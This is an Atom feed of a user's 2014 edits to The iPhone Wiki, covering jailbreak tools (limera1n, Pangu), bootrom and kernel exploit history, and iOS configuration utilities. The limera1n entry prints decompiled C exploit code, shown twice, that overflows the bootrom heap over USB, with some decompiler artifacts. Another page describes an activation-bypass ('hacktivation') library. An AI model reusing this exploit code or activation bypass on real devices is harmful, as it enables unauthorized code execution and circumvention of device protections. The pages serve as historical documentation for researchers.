https://www.theiphonewiki.com/w/api.php?action=feedcontributions&user=Ryandolan123&feedformat=atom
The iPhone Wiki - User contributions [en]
2024-03-19T07:29:02Z
User contributions
MediaWiki 1.31.14
https://www.theiphonewiki.com/w/index.php?title=Limera1n_Exploit&diff=42542
Limera1n Exploit
2014-09-26T01:18:31Z
<p>Ryandolan123: </p>
<hr />
<div>{{lowercase}}<br />
The '''limera1n exploit''' is the [[bootrom]] exploit used to run unsigned code (and thereby jailbreak) the [[N18ap|iPod touch 3rd Generation]], the [[N88ap|iPhone 3GS]] and all [[S5L8930|A4]]-based devices. It was first used in the [[limera1n]] tool by [[User:geohot|geohot]]. It is used to perform a [[tethered jailbreak]] on the aforementioned devices. The jailbreak can then be turned into an [[untethered jailbreak]] with other exploits, such as the [[0x24000 Segment Overflow]] or the [[Packet Filter Kernel Exploit]]. limera1n is the final publicly disclosed bootrom exploit of any device. The last device released vulnerable to limera1n is the [[iPhone3,3|iPhone 4 (CDMA)]].<br />
<br />
==Source Code==<br />
signed int __cdecl upload_exploit() {<br />
int device_type;<br />
signed int payload_address;<br />
int free_address;<br />
int deviceerror;<br />
char *chunk_headers_ptr;<br />
unsigned int sent_counter;<br />
//int v6;<br />
signed int result; <br />
//signed int v8;<br />
int recv_error_code;<br />
signed int payload_address2;<br />
signed int padding_size;<br />
char payload;<br />
char chunk_headers;<br />
//int v14;<br />
//v14 = *MK_FP(__GS__, 20);<br />
device_type = *(_DWORD *)(device + 16);<br />
<br />
if ( device_type == 8930 ) {<br />
padding_size = 0x2A800;<br />
payload_address = 0x8402B001;<br />
free_address = 0x8403BF9C;<br />
} else {<br />
payload_address = 0x84023001;<br />
padding_size = 0x22800;<br />
// free_address = (((device_type == 8920) – 1) & 0xFFFFFFF4) – 0x7BFCC05C;<br />
if(device_type == 8920) free_address = 0x84033FA4;<br />
else free_address = 84033F98;<br />
}<br />
<br />
memset(&payload, 0, 0x800);<br />
memcpy(&payload, exploit, 0x230);<br />
<br />
if (libpois0n_debug) {<br />
//v8 = payload_address;<br />
fprintf(stderr, 1, "Resetting device counters\n");<br />
//payload_address = v8;<br />
}<br />
<br />
payload_address2 = payload_address;<br />
deviceerror = irecv_reset_counters(client);<br />
<br />
if ( deviceerror ) {<br />
irecv_strerror(deviceerror);<br />
fprintf(stderr, 1, &aCannotFindS[12]);<br />
result = -1;<br />
} else {<br />
memset(&chunk_headers, 0xCC, 0x800);<br />
chunk_headers_ptr = &chunk_headers;<br />
<br />
do {<br />
*(_DWORD *)chunk_headers_ptr = 1029; <br />
*((_DWORD *)chunk_headers_ptr + 1) = 257;<br />
*((_DWORD *)chunk_headers_ptr + 2) = payload_address2; <br />
*((_DWORD *)chunk_headers_ptr + 3) = free_address;<br />
chunk_headers_ptr += 64;<br />
} while ((int *)chunk_headers_ptr != &v14);<br />
<br />
if (libpois0n_debug)<br />
fprintf(stderr, 1, "Sending chunk headers\n");<br />
<br />
sent_counter = 0;<br />
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);<br />
memset(&chunk_headers, 0xCC, 0x800);<br />
<br />
do {<br />
sent_counter += 0x800;<br />
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);<br />
} while (sent_counter < padding_size);<br />
<br />
if (libpois0n_debug)<br />
fprintf(stderr, 1, "Sending exploit payload\n");<br />
<br />
irecv_control_transfer(client, 0x21, 1, 0, 0, &payload, 0x800);<br />
<br />
if (libpois0n_debug)<br />
fprintf(stderr, 1, "Sending fake data\n");<br />
<br />
memset(&chunk_headers, 0xBB, 0x800);<br />
irecv_control_transfer(client, 0xA1, 1, 0, 0, &chunk_headers, 0x800);<br />
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);<br />
<br />
if (libpois0n_debug)<br />
fprintf(stderr, 1, "Executing exploit\n");<br />
<br />
irecv_control_transfer(client, 0x21, 2, 0, 0, &chunk_headers, 0);<br />
irecv_reset(client);<br />
irecv_finish_transfer(client);<br />
<br />
if (libpois0n_debug) {<br />
fprintf(stderr, 1, "Exploit sent\n");<br />
if (libpois0n_debug)<br />
fprintf(stderr, 1, "Reconnecting to device\n");<br />
}<br />
<br />
client = (void *)irecv_reconnect(client, 2);<br />
<br />
if (client) {<br />
result = 0;<br />
} else {<br />
if (libpois0n_debug) {<br />
recv_error_code = irecv_strerror(0);<br />
fprintf(stderr, 1, &aCannotFindS[12], recv_error_code);<br />
}<br />
fprintf(stderr, 1, "Unable to reconnect\n");<br />
result = -1;<br />
}<br />
}<br />
<br />
// compiler stack check<br />
//if (*MK_FP(__GS__, 20) != v14)<br />
// __stack_chk_fail(v6, *MK_FP(__GS__, 20) ^ v14);<br />
<br />
return result;<br />
}<br />
<br />
[[Category:Exploits]]<br />
[[Category:Bootrom Exploits]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Limera1n_Exploit&diff=42541
Limera1n Exploit
2014-09-26T01:18:02Z
<p>Ryandolan123: </p>
<hr />
<div>{{lowercase}}<br />
The '''limera1n exploit''' is the [[bootrom]] exploit used to run unsigned code (and thereby jailbreak) the [[N18ap|iPod touch 3rd Generation]], the [[N88ap|iPhone 3GS]] and all [[S5L8930|A4]]-based devices. It was first used in the [[limera1n]] tool by [[User:geohot|geohot]]. It is used to perform a [[tethered jailbreak]] on the aforementioned devices. The jailbreak can then be turned into an [[untethered jailbreak]] with other exploits, such as the [[0x24000 Segment Overflow]] or the [[Packet Filter Kernel Exploit]]. limera1n is the final publicly disclosed bootrom exploit of any device. The last device released vulnerable to limera1n is the [[iPhone3,3|iPhone 4 (CDMA)]]<br />
<br />
==Source Code==<br />
signed int __cdecl upload_exploit() {<br />
int device_type;<br />
signed int payload_address;<br />
int free_address;<br />
int deviceerror;<br />
char *chunk_headers_ptr;<br />
unsigned int sent_counter;<br />
//int v6;<br />
signed int result; <br />
//signed int v8;<br />
int recv_error_code;<br />
signed int payload_address2;<br />
signed int padding_size;<br />
char payload;<br />
char chunk_headers;<br />
//int v14;<br />
//v14 = *MK_FP(__GS__, 20);<br />
device_type = *(_DWORD *)(device + 16);<br />
<br />
if ( device_type == 8930 ) {<br />
padding_size = 0x2A800;<br />
payload_address = 0x8402B001;<br />
free_address = 0x8403BF9C;<br />
} else {<br />
payload_address = 0x84023001;<br />
padding_size = 0x22800;<br />
// free_address = (((device_type == 8920) – 1) & 0xFFFFFFF4) – 0x7BFCC05C;<br />
if(device_type == 8920) free_address = 0x84033FA4;<br />
else free_address = 84033F98;<br />
}<br />
<br />
memset(&payload, 0, 0x800);<br />
memcpy(&payload, exploit, 0x230);<br />
<br />
if (libpois0n_debug) {<br />
//v8 = payload_address;<br />
fprintf(stderr, 1, "Resetting device counters\n");<br />
//payload_address = v8;<br />
}<br />
<br />
payload_address2 = payload_address;<br />
deviceerror = irecv_reset_counters(client);<br />
<br />
if ( deviceerror ) {<br />
irecv_strerror(deviceerror);<br />
fprintf(stderr, 1, &aCannotFindS[12]);<br />
result = -1;<br />
} else {<br />
memset(&chunk_headers, 0xCC, 0x800);<br />
chunk_headers_ptr = &chunk_headers;<br />
<br />
do {<br />
*(_DWORD *)chunk_headers_ptr = 1029; <br />
*((_DWORD *)chunk_headers_ptr + 1) = 257;<br />
*((_DWORD *)chunk_headers_ptr + 2) = payload_address2; <br />
*((_DWORD *)chunk_headers_ptr + 3) = free_address;<br />
chunk_headers_ptr += 64;<br />
} while ((int *)chunk_headers_ptr != &v14);<br />
<br />
if (libpois0n_debug)<br />
fprintf(stderr, 1, "Sending chunk headers\n");<br />
<br />
sent_counter = 0;<br />
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);<br />
memset(&chunk_headers, 0xCC, 0x800);<br />
<br />
do {<br />
sent_counter += 0x800;<br />
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);<br />
} while (sent_counter < padding_size);<br />
<br />
if (libpois0n_debug)<br />
fprintf(stderr, 1, "Sending exploit payload\n");<br />
<br />
irecv_control_transfer(client, 0x21, 1, 0, 0, &payload, 0x800);<br />
<br />
if (libpois0n_debug)<br />
fprintf(stderr, 1, "Sending fake data\n");<br />
<br />
memset(&chunk_headers, 0xBB, 0x800);<br />
irecv_control_transfer(client, 0xA1, 1, 0, 0, &chunk_headers, 0x800);<br />
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);<br />
<br />
if (libpois0n_debug)<br />
fprintf(stderr, 1, "Executing exploit\n");<br />
<br />
irecv_control_transfer(client, 0x21, 2, 0, 0, &chunk_headers, 0);<br />
irecv_reset(client);<br />
irecv_finish_transfer(client);<br />
<br />
if (libpois0n_debug) {<br />
fprintf(stderr, 1, "Exploit sent\n");<br />
if (libpois0n_debug)<br />
fprintf(stderr, 1, "Reconnecting to device\n");<br />
}<br />
<br />
client = (void *)irecv_reconnect(client, 2);<br />
<br />
if (client) {<br />
result = 0;<br />
} else {<br />
if (libpois0n_debug) {<br />
recv_error_code = irecv_strerror(0);<br />
fprintf(stderr, 1, &aCannotFindS[12], recv_error_code);<br />
}<br />
fprintf(stderr, 1, "Unable to reconnect\n");<br />
result = -1;<br />
}<br />
}<br />
<br />
// compiler stack check<br />
//if (*MK_FP(__GS__, 20) != v14)<br />
// __stack_chk_fail(v6, *MK_FP(__GS__, 20) ^ v14);<br />
<br />
return result;<br />
}<br />
<br />
[[Category:Exploits]]<br />
[[Category:Bootrom Exploits]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Untethered_jailbreak&diff=42539
Untethered jailbreak
2014-09-26T01:13:28Z
<p>Ryandolan123: /* Device support */</p>
<hr />
<div>An untethered jailbreak is a type of [[jailbreak]] where your device does not require you to reboot with a connection to an external device capable of executing commands on the device. <br />
<br />
== Device support ==<br />
Many device/firmware combinations can use an untethered jailbreak.<br />
<br />
Devices as new as the [[iPhone 4|iPhone 4]]/[[N81ap|iPod touch 4G]]/[[K66ap|Apple TV 2G]] have known [[bootrom]] exploits. However, the [[N88ap|iPhone 3GS]] ([[Bootrom 359.3|old bootrom]]) and older have bootrom exploits that allow for an untethered jailbreak. Newer devices as old as the [[N88ap|iPhone 3GS]] ([[Bootrom 359.3.2|new bootrom]]), [[N72ap|iPod touch 2G]] ([[Bootrom 240.5.1|new bootrom]]), and [[N18ap|iPod touch 3G]] have bootrom exploits that are limited to a [[tethered jailbreak]] (without the assistance of a firmware-based exploit).<br />
<br />
==Different Types==<br />
There are 2 types of untethered jailbreaks: Patched [[LLB]]-based and kernel hacks. On the first sort, that requires an untethered bootrom dump (e.g. [[24kpwn]] or [[Pwnage 2.0]]), it is permanent and unpatchable, except for an hardware update. This type of jailbreak patches the LLB to not check the firmware at boot-up , letting a pwned kernel or a custom bootlogo to be uploaded to the system. The second type, uploads the unpwned kernel, the system checks the signature, then a kernel exploit happens and the kernel is being patched and changed to fit jailbreak. After the exploit, the bootlogo can be changed. A userland exploit was used before the kernel exploit to get bypassed the iBoot signature checks before the kernel exploit. up to iOS 4.3.3, [[Incomplete Codesign Exploit]] was used. in iOS 4.3.4, it was patched. in 5.0.1 [[Racoon String Format Overflow Exploit]] is used instead. The kernel exploits found so far: [[BPF_STX Kernel Write Exploit]] (works up to iOS 3.2), [[iOSurface Kernel Exploit]] (works up to iOS 4.0.1, excluding 3.2.2), [[Packet Filter Kernel Exploit]] (Works up to iOS 4.2 beta 3), [[HFS Legacy Volume Name Stack Buffer Overflow]] (vulnerability in HFS, works up to iOS 4.2.8), [[ndrv_setspec() Integer Overflow]] (Works up to iOS 4.3.3) and [[HFS Heap Overflow]] (Works up to iOS 5.0.1)<br />
<br />
==Utilities capable of untethered jailbreaks==<br />
These jailbreak utilities can perform an untethered jailbreak, sorted by operating system.<br />
<br />
===iOS===<br />
[[Star]] and [[saffron]] run on the device itself, and are completely independent of a computer's operating system. JailbreakMe has supported so far 1.0-1.1.1,3.1.2-4.0.1(no 3.2.2) and 4.3-4.3.3. Each device can be jailbroken on those firmwares, No matter what, but if [[SHSH]] blobs aren't given for a certain firmware, it is not restorable.<br />
<br />
<br />
===Mac OS X===<br />
* [[Absinthe]]<br />
* [[blackra1n]]<br />
* [[evasi0n]]<br />
* [[Greenpois0n (jailbreak)|greenpois0n]]<br />
* [[limera1n]]<br />
* [[PwnageTool]]<br />
* [[redsn0w]]<br />
* [[Spirit]]<br />
<br />
===Windows===<br />
* [[Absinthe]]<br />
* [[evasi0n]]<br />
* [[blackra1n]]<br />
* [[Greenpois0n (jailbreak)|greenpois0n]]<br />
* [[limera1n]]<br />
* [[redsn0w]]<br />
* [[sn0wbreeze]]<br />
* [[Spirit]]<br />
<br />
===Linux===<br />
* [[Absinthe]]<br />
* [[evasi0n]]<br />
* [[Greenpois0n (jailbreak)|greenpois0n]]<br />
* [[redsn0w]] (0.8)<br />
* [[Spirit]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=IPhone_Configuration_Utility&diff=42155
IPhone Configuration Utility
2014-09-14T03:29:18Z
<p>Ryandolan123: </p>
<hr />
<div>{{DISPLAYTITLE:iPhone Configuration Utility}}[[Image:IPCU_icon.png|right|thumb|150px|iPCU icon.]]<br />
iPhone Configuration Utility (iPCU) is a tool for managing [[IPad]]s, [[IPhone]]s and [[IPod touch]]es in corporate environments. There are versions for Mac OS X and Windows available, though Apple now points Mac users to their [[Apple Configurator]]. The iPhone Configuration Utility offers the following features:<br />
<br />
* Creating, editing and installing [[Configuration Profile|configuration profiles]]<br />
* Installing [[provisioning profile|provisioning profiles]]<br />
* Installing unpacked .app bundles (without IPA container)<br />
* Viewing [[System Log|syslog]] of the connected device<br />
<br />
==Configuration Profiles==<br />
{{Main|Configuration Profile}}<br />
Configuration profile is a set of restrictions and/or settings that allow the device to work with corporate infrastructure and conform to the established IT policy. It can include email and Exchange accounts, Wi-Fi settings, digital certificates, passcode lock and password complexity requirements, etc.<br />
<br />
For normal folks a feature of interest might be the ability to set custom APN (if their [[carrier bundle]] doesn't allow it to be changed in Settings) and configure proxy for cellular data. This may be necessary to get internet access on certain carriers without data plan.<br />
<br />
Historically, configuration profiles were used by sites such as [http://help.benm.at help.benm.at] to enable tethering on carriers which did not support it officially.<br />
<br />
==Certificate Installation==<br />
On first launch iPCU creates a self-signed certificate in the Mac OS X keychain or Windows certificate store (run certmgr.msc and navigate to "ipcu" to view it). This certificate is then silently installed onto any iDevice that is connected to iPCU, and cannot be removed.<br />
Configuration profiles that are subsequently installed are signed with this certificate, which allows iDevices to validate profile authenticity.<br />
<br />
==Resources==<br />
*[http://support.apple.com/kb/DL851 Download for OS X]<br />
*[http://support.apple.com/downloads/iPhone_Configuration_Utility_3_4_for_Windows Download for Windows]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=File_talk:Theiphonewiki.png&diff=42154
File talk:Theiphonewiki.png
2014-09-14T03:21:31Z
<p>Ryandolan123: </p>
<hr />
<div>Could I possibly upload a new version of The iPhone wiki logo? The old one just seems a bit dated :P [[User:ryandolan123|ryandolan123]] ([[User talk:ryandolan123|talk]]) 03:21, 14 September 2014 (UTC)</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=File_talk:Theiphonewiki.png&diff=42153
File talk:Theiphonewiki.png
2014-09-14T03:21:00Z
<p>Ryandolan123: Created page with "Could I possibly upload a new version of The iPhone wiki logo? The old one just seems a bit dated :P ~~~~"</p>
<hr />
<div>Could I possibly upload a new version of The iPhone wiki logo? The old one just seems a bit dated :P [[User:Ryandolan123|Ryandolan123]] ([[User talk:Ryandolan123|talk]]) 03:21, 14 September 2014 (UTC)</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Alpine_1A420&diff=42152
Alpine 1A420
2014-09-14T03:18:10Z
<p>Ryandolan123: /* Kernel Caches */</p>
<hr />
<div>[[Firmware]] of an iPhone 2G Prototype discussed on [http://forums.macrumors.com/showthread.php?t=627449 Mac Rumors]. <br />
Based on ''/private/var/db/dyld/update-prebinding-paths.txt'' this release is called Alpine Build 1A420.<br />
<br />
== Restore ==<br />
Instead of it being done through a ramdisk, the restore tools seem all to be right there in the OS, This is probably because they originally did restores through userland.<br />
<br />
== Baseband ==<br />
* The iPhone 2G Prototype came with [[03.06.01_G]][http://img399.imageshack.us/i/iphone2go0.jpg]<br />
* The firmware dump comes (in ''/usr/local/standalone/firmware/'') with 03.06.00 <br />
<br />
Flashing 03.06.00 on a retail 2G iPhone can be done with bbupdater, but results in loss of Carrier Network connectivity.<br />
<br />
== Kernel Caches ==<br />
In /System/Library/Caches/com.apple.kernelcaches, there are kernels for other CPUs, such as S5I3000, S5L8900XFPGA and Freescale MX31. This is probably because Apple did not know which one to use at the time, and/or they had different prototypes with different CPUs in them.<br />
<br />
== See Also ==<br />
* [[Alpine 1A420 (iPhone) Contents]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=User:Ryandolan123&diff=42112
User:Ryandolan123
2014-09-12T15:40:43Z
<p>Ryandolan123: </p>
<hr />
<div>ryandolan123 makes things<br />
{{stub}}</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Pangu&diff=41560
Pangu
2014-07-09T15:03:34Z
<p>Ryandolan123: </p>
<hr />
<div>{{other|untethered jailbreak for iOS 7.1.x|semi-tethered jailbreak for iOS 7.1.x|Geeksn0w}}<br />
{{Infobox software<br />
| name = Pangu<br />
| title = Pangu<br />
| screenshot = [[File:Pangu-v1.1.0-interface.png|310px]]<br />
| caption = Pangu v1.1.0 on Windows 7<br />
| author = Pangu Team<br />
| developer = Pangu Team<br />
| released = {{Start date|2014|06|23|df=yes}}<br />
| discontinued = <br />
| latest release version = 1.1.0<br />
| latest release date = {{Start date and age|2014|06|29|df=yes}}<br />
| latest preview version = <br />
| latest preview date = <br />
| programming language = C?<br />
| operating system = [[wikipedia:Microsoft Windows|Microsoft Windows]] / [[wikipedia:OS X|OS X]]<br />
| size = <br />
| platform = <br />
| language = [[wikipedia:English language|English]] / [[wikipedia:Chinese language|Chinese]]<br />
| status = Active<br />
| genre = Jailbreaking<br />
| license = [[wikipedia:Freeware|Freeware]]<br />
| website = [http://en.pangu.io en.pangu.io]<br>[http://pangu.io pangu.io]<br />
}}<br />
<br />
'''Pangu''' is a [[jailbreak]] program. It performs an [[untethered jailbreak]] for all devices on iOS 7.1.x, except the [[Apple TV]]. It was initially released on 23 June 2014, and became subject to [[#Controversy|controversy and criticism]].<br />
<br />
== Controversy ==<br />
Pangu used to install 25PP, a Chinese cracked app store, if the user ticks the checkbox to install it. As of version 1.1, the 25PP checkbox is not included unless the device language is set to Chinese. iH8sn0w confirmed that Pangu does not install anything else on the device.<br />
<br />
<!-- Pangu also uses a revoked enterprise certificate in order to inject the jailbreak, which is removed after the jailbreak is complete.<br />
<br />
Is this controversial of the pangu jailbreak? I never heard it being a problem. <br />
--><br />
<br />
Originally, Pangu used code ripped from [[i0n1c]]'s jailbreak training sessions, as well as an info leak vulnerability from said sessions. Version 1.1 kept most of the code, but swapped his info leak with another one, which uselessly disclosed another vulnerability to Apple.<br />
<br />
== Supported Devices ==<br />
The only unsupported devices are those of the [[Apple TV]] family. All other devices capable of running [[iOS]] 7.1.x are supported.<br />
<br />
== Download ==<br />
{| class="wikitable"<br />
! Version<br />
! OS<br />
! SHA-1 Hash<br />
! colspan="2" | Download<br />
! Changes<br />
|-<br />
| 1.0.0<br />
| [[wikipedia:Microsoft Windows|Windows]]<br />
| <code>7d66f1f939cbf877f1e90480571f92b238245fab</code><br />
| [http://dl.pangu.25pp.com/jb/Pangu_v1.0.exe 25PP]<br />
| {{n/a}}<br />
| Initial release<br />
|-<br />
| rowspan="2" | 1.1.0<br />
| [[wikipedia:Microsoft Windows|Windows]]<br />
| <code>732e5fca772e6fd6f29ab56d2e39df21bf1cbe5f</code><br />
| [http://dl.pangu.25pp.com/jb/Pangu_v1.1.exe 25PP]<br />
| [https://mega.co.nz/#!vB8yiDhI!TNmvwa0my_OvURXVzpUVhGE2QPZQsWitXy6nFRCKO_k MEGA]<br />
| rowspan="2" | <br />
*Reduce application size<br />
*English translation<br />
*Improved user interface and networking<br />
*Replaces i0n1c's infoleak exploit with a different one<br />
*Remove the choice to install the Chinese piracy store unless device language is set to Chinese<br />
*First OS X release<br />
|-<br />
| [[wikipedia:OS X|OS X]]<br />
| <code>a0158e29a4b064913e976c869e49c54c8a53fa75</code><br />
| [http://dl.pangu.25pp.com/jb/Pangu_v1.1.dmg 25PP]<br />
| class="rborderplz nobrradiusplz" | [https://mega.co.nz/#!DV1AwQjD!jaYJ5OuIlpc2pbURDaIHh-4Abeybam-OILD9oNNWeXw MEGA]<br />
|}<br />
<br />
[[Category:Jailbreaks]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Limera1n&diff=41559
Limera1n
2014-07-09T14:54:01Z
<p>Ryandolan123: Reversed edit of mine which unintentionally removed a parenthesis</p>
<hr />
<div>{{lowercase}}<br />
[[Image:Ra1ndrop.png|right]]<br />
''' limera1n''' is [[User:Geohot|geohot]]'s [[jailbreak]] utility. It uses a previously undisclosed bootrom exploit and [[User:Comex|comex]]'s [[Packet Filter Kernel Exploit]] to achieve an [[untethered jailbreak]] on many devices. The following devices are supported:<br />
* [[n88ap|iPhone 3GS]]<br />
* [[n90ap|iPhone 4 (iPhone3,1)]]<br />
* [[n18ap|iPod touch 3G]]<br />
* [[n81ap|iPod touch 4G]]<br />
* [[k48ap|iPad 1G]]<br />
* [[k66ap|Apple TV 2G]] (creates a bare-bones jailbreak by mounting '/' as read/write in /etc/fstab)<br />
limera1n has been demonstrated multiple times by [[User:Geohot|geohot]], using blog posts on his now private blog. [[User:Geohot|Geohot]] showed off a high-res picture of [http://1.bp.blogspot.com/_NJ4JFBfr1tY/TDgkAsTQEmI/AAAAAAAAAcw/ZNHDxMNNL4Y/s1600/iphone4.png Cydia on an iPhone 4]. He displayed an [http://www.youtube.com/watch?v=__TR86PLiHw iPod touch 3G with an untethered jailbreak] that met [[User:MuscleNerd|MuscleNerd]]'s requirements for a good video. In addition, he took a picture of [http://4.bp.blogspot.com/_NJ4JFBfr1tY/S7_OvGMqJMI/AAAAAAAAAcE/R5WLrCizGw0/s1600/ipad_jb.jpg Cydia and blackra1n icons on an iPad].<br />
<br />
* '''Release Date:''' [[Timeline#October|October 9, 2010]]<br />
* '''Supported OS's:''' Mac OS X, Windows<br />
* '''Supported Operations:''' [[hacktivation]], [[jailbreak]]ing<br />
* '''Supported iOS: 3.2.2-4.1<br />
<br />
<br />
== Release text ==<br />
<div style="text-align: center">limera1n, 6 months in the making<br /><br />
iPhone 3GS, iPod Touch 3G, iPad, iPhone 4, iPod Touch 4G<br /><br />
4.0-4.1 and beyond+++<br /><br />
limera1n is unpatchable<br /><br />
untethered thanks to jailbreakme star '''comex'''<br /><br />
brought to you by '''geohot'''<br /><br />
hacktivates<br /><br />
Mac coming in 7 years<br /><br />
donations keep support alive<br /><br />
zero pictures of my face</div><br />
<br />
== Credit ==<br />
* '''[[User:Geohot|geohot]]''' - The program itself, and the bootrom exploit.<br />
* '''[[User:Comex|comex]]''' - The userland exploit that allows limera1n to run [[untethered jailbreak|untethered]].<br />
<br />
== Changelog ==<br />
{| class="wikitable"<br />
|-<br />
| <div style="text-align: center">'''Version'''</div><br />
| <div style="text-align: center">'''Release time'''</div><br />
| <div style="text-align: center">'''MD5 Hash'''</div><br />
| <div style="text-align: center">'''Change comment'''</div><br />
|-<br />
| BETA 1<br />
| 9 Oct 2010 XX:XX GMT<br />
| 2f2b09a6ed5c5613d5361d8a9d0696b6<br />
| First release.<br />
|-<br />
| BETA 2<br />
| 10 Oct 2010 XX:XX GMT<br />
| a70dccb3dfc0e505687424184dc3d1ce<br />
| Fixed kernel patching magic. Rerun BETA2+ over BETA1.<br />
|-<br />
| BETA 3<br />
| 10 Oct 2010 XX:XX GMT<br />
| 81730090f7de1576268ee8c2407c3d35<br />
| Fixed an issue with [[N88ap|iPhone 3GS]] ([[Bootrom 359.3.2|new bootrom]])<br />
|-<br />
| BETA 4<br />
| 10 Oct 2010 XX:XX GMT<br />
| d901c4b3a544983f095b0d03eb94e4db<br />
| Uninstall fixed, respring fixed<br />
|-<br />
| RC1<br />
| 11 Oct 2010 XX:XX GMT<br />
| 0622d99ffe4c25f75c720a689853845f<br />
| out of beta! afc2, reliability improvements, no reboot for cydia, 2kb smaller<br />
|-<br />
| RC1b<br />
| 11 Oct 2010 XX:XX GMT<br />
| fc6f7d696a57c3baede49bdff8a7f43f<br />
| addresses an install issue, mainly with iPads<br />
|-<br />
| Final<br />
| 11 Oct 2010 23:XX GMT<br />
| fc6f7d696a57c3baede49bdff8a7f43f<br />
| (same as RC1b)<br />
|}<br />
<br />
== Technical Information ==<br />
=== Basics ===<br />
* limera1n has nothing to do with [[SHA-1 Image Segment Overflow|SHAtter]] at all.<br />
* limera1n uses a [[bootrom]] exploit to achieve the [[tethered jailbreak]] and unsigned code execution.<br />
* limera1n uses a [[userland]] exploit to make it [[untethered]], which was developed by [[User:Comex|comex]].<br />
* limera1n uses a hacktivation dylib to perform [[hacktivation]].<br />
<br />
=== Exploits ===<br />
limera1n reuses the [[Usb_control_msg(0x21,_2)_Exploit|usb_control_msg(0x21,2)]] but exploits a different vulnerability (see [[Limera1n Exploit]]).<br />
<br />
=== Process ===<br />
The jailbreak appears to execute something like the following (in no particular order):<br />
* In recovery1,<br />
"setenv debug-uarts 1<br />
setenv auto-boot false<br />
saveenv"<br />
* In [[DFU Mode]], it uploads a [[payload]].<br />
* In recovery2, it uploads another [[payload]] and its [[ramdisk]].<br />
"setenv auto-boot true<br />
reset<br />
geohot done"<br />
<br />
=== Interesting Messages ===<br />
"geohot black is the new purple"<br />
<br />
"blackra1n start: %d current IRQ mask is %8.8X<br />
usb irq disabled...shhh<br />
fxns found @ %8.8X %8.8X<br />
found iBoot @ %8.8X<br />
i'm back from IRQland...<br />
3g detected, kicking nor<br />
nor kicked<br />
memcpy done<br />
iBoot restored!!!<br />
found command table @ %8.8X<br />
cmd_geohot added<br />
time to pray...%8.8X"<br />
<br />
"2.2X send command(%d): %s<br />
send exploit!!!<br />
sent data to copy: %X<br />
sent shellcode: %X has real length %X<br />
never freed: %X<br />
sent fake data to timeout: %X<br />
sent exploit to heap overflow: %X<br />
sending file with length: 0x%X Mingw runtime failure:<br />
VirtualQuery failed for %d bytes at address %p Unknown pseudo relocation protocol version %d.<br />
Unknown pseudo relocation bit size %d."<br />
<br />
== Controversy ==<br />
The release of this jailbreak was specifically designed to pressure the [[Chronic Dev (team)|Chronic Dev Team]] into not releasing [[SHA-1 Image Segment Overflow|SHAtter]], and instead implement the limera1n exploit into [[Greenpois0n (jailbreak)|greenpois0n]]; after releasing limera1n, releasing [[SHA-1 Image Segment Overflow|SHAtter]] would uselessly disclose another bootrom exploit to Apple.<br />
<br />
[[User:Geohot|Geohot]]'s rationale was that Apple already discovered, through internal testing, the limera1n exploit, making it very likely that it will be fixed in the next bootrom revision. Because [[iBoot]] code is present both in the bootrom and firmware, and because firmware is refreshed much more often than bootrom code, any fix in this code branch would appear first in firmware. [[User:Geohot|Geohot]] observed his limera1n exploit was closed in firmware and concluded that it would almost certainly be fixed in the next bootrom revision, whereas [[SHA-1 Image Segment Overflow|SHAtter]] still has a chance of remaining useful for an indefinite amount of time. Both vulnerabilities ended up being patched in the [[iPad 2]]. It was fixed before the release of limera1n according to the build number. This has been confirmed by [[User:posixninja|p0sixninja]].<br />
<br />
limera1n's [[Untethered jailbreak|untethered]] userland exploit for iOS 4.0 and 4.1 was obtained by [[User:Geohot|geohot]] under questionable circumstances from [[User:Comex|comex]]. [[User:Comex|Comex]] did end up fixing the kernel patching code by beta2, so as to not break users' devices.<br />
<br />
== Hacktivation ==<br />
limera1n will copy hacktivation.dylib to [[:/usr/lib]] and change entries to com.apple.mobile.lockdown.plist, whether it has been activated using iTunes or not. This, while helpful to many, can also be harmful to legitimate activators. For a guide on how to remove this hacktivation on iTunes activated devices, see the link below.<br />
<br />
== External Links ==<br />
* [http://limera1n.com/ Official domain] <br />
* [http://theiphonewiki.com/limera1n The iPhone Wiki Mirror]<br />
* [http://www.mediafire.com/?5sovoo41rbcdspw Limera1n RC Beta2 Dump on Mediafire provided by iH8sn0w.]<br />
* [http://www.pastie.org/1210054 Veeence's explanation for release]<br />
* [http://www.hackint0sh.org/blackra1n-3g-s-jailbreak-220/how-removing-blackra1n-limera1n-hacktivation-130992.htm Hacktivation removal guide.]<br />
<br />
[[Category:Hacking Software]]<br />
[[Category:Jailbreaks]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Limera1n&diff=41558
Limera1n
2014-07-09T14:51:53Z
<p>Ryandolan123: </p>
<hr />
<div>{{lowercase}}<br />
[[Image:Ra1ndrop.png|right]]<br />
''' limera1n''' is [[User:Geohot|geohot]]'s [[jailbreak]] utility. It uses a previously undisclosed bootrom exploit and [[User:Comex|comex]]'s [[Packet Filter Kernel Exploit]] to achieve an [[untethered jailbreak]] on many devices. The following devices are supported:<br />
* [[n88ap|iPhone 3GS]]<br />
* [[n90ap|iPhone 4 (iPhone3,1]]<br />
* [[n18ap|iPod touch 3G]]<br />
* [[n81ap|iPod touch 4G]]<br />
* [[k48ap|iPad 1G]]<br />
* [[k66ap|Apple TV 2G]] (creates a bare-bones jailbreak by mounting '/' as read/write in /etc/fstab)<br />
